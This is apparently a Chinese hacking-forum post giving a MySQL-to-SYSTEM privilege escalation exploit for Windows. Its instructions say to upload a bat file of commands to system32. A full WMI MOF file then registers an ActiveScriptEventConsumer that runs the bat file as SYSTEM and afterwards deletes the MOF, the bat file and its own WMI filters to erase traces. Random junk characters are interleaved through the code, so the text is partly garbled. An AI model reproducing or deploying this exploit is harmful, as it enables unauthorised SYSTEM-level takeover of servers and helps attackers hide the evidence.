Mysql 提权即时无错Mof exp

admin

这个sql提权MOF需要运行 system下的文件，不能定义路径。
需要将要运行的命令写入到bat上传到system32目录，然后执行。

这个sql提权MOF需要运行 system下的文件，不能定义路径。
* B" i. c, S! N" A2 ~" L需要将要运行的命令写入到bat上传到system32目录，然后执行。
* h+ j! H- s. t5 u
6 ]2 H: ?& ~" S8 j2 O: j#pragma
                        namespace("\\\\.\\root\\cimv2")
  n) ]$ i" r5 K. n6 w; x% \                        class
7 ^6 o8 J4 Z2 i- |* \2 T6 x                        MyClass547
                        {           [key]
                        string
                        Name;
) |) u, `( ?! e6 J4 q2 i                        };
                        class
2 n  M+ E2 ?* j# A* X                        ActiveScriptEventConsumer
                        : __EventConsumer {          [key]
7 F- ]- K: e" N7 l: \2 C                        string
                        Name;           [not_null]
                        string
% S( I) K4 k7 a( q/ g5 O& q3 {7 \                        ScriptingEngine;           string
! ]# P2 K9 S6 ?                        ScriptFileName;           [template]
                        string
2 G! a9 X. Z9 ]0 a1 Y                        ScriptText;         uint32 KillTimeout;
                        }; instance of __Win32Provider as $P {
                        Name
- m, s- g% h) o                        =
( X4 C. N3 t$ H% ~! O                        "ActiveScriptEventConsumer";     CLSID =
                        "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
" N* h) v0 {4 y+ l8 E7 o' N2 }                        PerUserInitialization
                        = TRUE;
3 n6 f8 r5 ?) E" h% I( j+ z                        }; instance of __EventConsumerProviderRegistration {         Provider
                        = $P;         ConsumerClassNames
6 F/ ?( [; K2 K. }                        =
4 z) L9 I& f6 r" E6 K/ u: O                        {"ActiveScriptEventConsumer"};
2 u/ }( o2 [, R* A8 b. Z                        };
                        Instance of ActiveScriptEventConsumer
                        as $cons {         Name
% t  w: v1 V* c$ v1 z& o+ Y7 [                        =
                        "ASEC";         ScriptingEngine
                        =
                        "JScript";         ScriptText
                        =
                        "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";          };
                        Instance of ActiveScriptEventConsumer
                        as $cons2 {         Name
: V" e  G9 N0 B6 \$ K                        =
                        "qndASEC";         ScriptingEngine
                        =
  D  ^2 e1 H. Z) f& ]& ~                        "JScript";         ScriptText
- s, O! f1 `8 g( ]) O, M# @8 q                        =
                        "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
                        }; instance of __EventFilter as $Filt {         Name
                        =
                        "instfilt";         Query
                        =
2 m, c6 z' ]4 o/ S                        "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";         QueryLanguage
. q3 H5 x* r2 s9 D& p% |                        =
* K9 z& r( P9 R. o4 c                        "WQL";         }; instance of __EventFilter as $Filt2 {         Name
( u4 w- ]2 T$ w, D1 K, G$ g                        =
' e8 p# s6 I/ q9 ]2 ^0 t  W                        "qndfilt";         Query
                        =
                        "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";         QueryLanguage
                        =
                        "WQL";          }; instance of __FilterToConsumerBinding as $bind {         Consumer
6 G) v! s1 s. T( ?6 h5 m                        = $cons;         Filter
                        = $Filt;
% ^% p2 s; Y6 l0 n' B$ I                        }; instance of __FilterToConsumerBinding as $bind2 {         Consumer
0 [" t% D. g; G1 Y: {                        = $cons2;         Filter
                        = $Filt2;
                        }; instance of MyClass547
- w, L7 {9 J. }7 K                        as $MyClass {         Name
: }9 X0 t5 o# N* J8 h4 J                        =
+ O/ t. F' g; A                        "ClassConsumer";
5 T& f* P* @# `                        };